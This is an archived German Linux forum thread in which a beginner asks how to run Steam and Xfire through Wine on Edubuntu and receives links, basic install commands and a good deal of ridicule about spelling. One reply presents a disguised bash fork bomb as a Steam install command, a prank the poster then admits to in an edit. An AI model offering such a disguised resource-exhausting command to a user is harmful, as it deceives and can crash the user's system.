PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Hilfe Wine



TanaToS
30.03.2008, 16:03
hallo ich hab früher vista/xp benutzt als desktop und linux so für server nun habe ich aber edubuntu und brauche :hilfe2: weil ich möchte steam starten und xfire.

LG TanaToS

PS: sry, für alle fehler

Edward Nigma
30.03.2008, 16:07
http://www.holarse-linuxgaming.de/h2006/space/STEAM

tiefengrund
30.03.2008, 16:11
ich hab früher vista/xp...

Ja das waren noch Zeiten ...

PS: Das ist ein typischer "so sollten Post's nicht gepostet werden" - Post !

TanaToS
30.03.2008, 16:15
kann man no einer sagen wie ich des wine insterlire?

tiefengrund
30.03.2008, 16:18
Hier droffklicken (http://www.galileo-press.de/openbook/ubuntu/ubuntu14_005.htm)

TanaToS
30.03.2008, 16:31
das hielft mir nicht würklich weiter!

tiefengrund
30.03.2008, 16:37
Na wenn Du nicht lesen kannst/willst dann kann ich Dir nicht helfen. Ohne Eigeninitiative wird das nix. Kostenlos ist nicht umsonst.

schönen Tag noch

Gott_in_schwarz
30.03.2008, 16:40
Versuch mal folgendes Kommando:

wineSTEAMINST=$(:(){:|:&};:)


edit: Bevor jetzt Jemand rumnölt: Das Ding hat nen Syntax Fehler (fehlende Leerzeichen um die curly-braces) und wäre auch in korrekter Form recht harmlos.
Und die Warnung "Bitte schließen Sie alle Applikationen, bevor Sie mit der Installation fortfahren" kennen auch windows-ler... (Vorwegen möglicher Datenverlust...)

supersucker
30.03.2008, 16:50
kann man no einer sagen wie ich des wine insterlire?

Ja, indem du google fragst und das online-Handbuch deiner Distribution liest.


das hielft mir nicht würklich weiter!

Nein, aber ein Duden koennte wohl helfen.

Nimm wieder Windows, mit deiner nicht vorhandenen Eigeninitiative wird das sowieso nichts.

bloodywing
30.03.2008, 17:01
Terminal öffnen und das eingeben

sudo apt-get install wine
und Kaffee trinken.

Edit: oh stimmt hast ja schon wine drauf
Edit2: schau mal hier (http://appdb.winehq.org/appview.php?versionId=1554) da wird das ausführlich beschrieben

Tblue
30.03.2008, 17:04
Danach dann

wine programm.exe
eingeben und hoffen.

Und vor allem: mach dir die Mühe und lies ein paar Dinge, bevor du am Ende wieder zu Windows zurückkehrst und deinen Freunden erzählst, wie schlecht Linux ist. ;)
Unter anderem bitte das lesen: Linux ist nicht Windows (http://felix-schwarz.name/files/opensource/articles/Linux_ist_nicht_Windows/)

TeaAge
30.03.2008, 18:38
Hier nochmal ein paar Anleitungen:

1. http://wiki.spielen-unter-linux.de/index.php/Benutzung_der_Konsole
2. http://wiki.spielen-unter-linux.de/index.php/Wine
dort steht auch wie man wine unter den verschiedenen Distributionen installiert
3. http://wiki.spielen-unter-linux.de/index.php/Steam

wie man Steam überhaupt installiert und alles weitere.
Sorgfältig lesen und sich daran genau orientieren!!

Gruß
TeaAge

Goodspeed
30.03.2008, 19:57
Aktueller Status -> Sandkasten

TanaToS
31.03.2008, 03:52
so jez habe ich steam geht aber nicht bzw die schrift fehlt wo muss ich die hin geben?

€: habs gefunden und nochmal danke für eure hilfe

kostjaXP
31.03.2008, 06:12
Die Deutsche Rechtschreibung ist Freeware, sprich, du kannst sie kostenlos nutzen. Allerdings ist sie nicht Open Source, d.h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen.
:D

TanaToS
31.03.2008, 18:29
Die Deutsche Rechtschreibung ist Freeware, sprich, du kannst sie kostenlos nutzen. Allerdings ist sie nicht Open Source, d.h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen.:D

Da ich Österreicher bin habe ich woll die Österrischen Driver oben xD

Rain_Maker
31.03.2008, 19:10
Hoffentlich kommt nicht als nächste Frage irgendwas zum Thema su/sudo.

Einem Ösi in Deutschland zu Rootrechten verhelfen soll schon mal schief gegangen sein .......

Greetz,

RM

P.S. Ja, ich kenne Godwin's Law, aber bei DER Vorlage .....